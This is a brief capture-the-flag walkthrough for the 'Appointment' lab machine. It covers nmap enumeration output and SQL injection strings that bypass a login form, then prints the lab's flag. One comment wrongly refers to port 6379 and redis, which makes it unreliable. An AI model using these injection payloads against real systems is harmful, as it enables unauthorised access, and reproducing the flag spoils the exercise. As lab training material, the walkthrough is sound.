01.APPOINTMENT (SQL INJECTION)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@oco:~$ nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 80/tcp   open  http          Apache httpd 2.4.38 ((Debian))

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 80
 PORT   STATE SERVICE VERSION
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Login

 * the -sC flag runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 80
 PORT   STATE SERVICE
 80/tcp open  http
 | http-internal-ip-disclosure: 
 |_  Internal IP Leaked: 127.0.0.1
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 | http-fileupload-exploiter: 
 |   
 |_    Couldn't find a file-type field.
 |_http-csrf: Couldn't find any CSRF vulnerabilities.
 | http-enum: 
 |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |   /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |   /js/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |_  /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |_http-dombased-xss: Couldn't find any DOM based XSS.

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found, the service may be fully patched (or none of the loaded scripts has a check for it)

FOOTHOLD/COMPROMISE

Submit root flag
# determine how the web app reacts to malicious user input in the login form
root@htb:~$ BROWSER > {targetSite:port}
 username field: admin'#
  * ALT: admin' OR 1 = '1 --
         admin' OR 1 = '1;--
 password field: {arbitraryPassword}
  * Congratulations! Your flag is: e3d0796d002a446c0e622226f42e9672
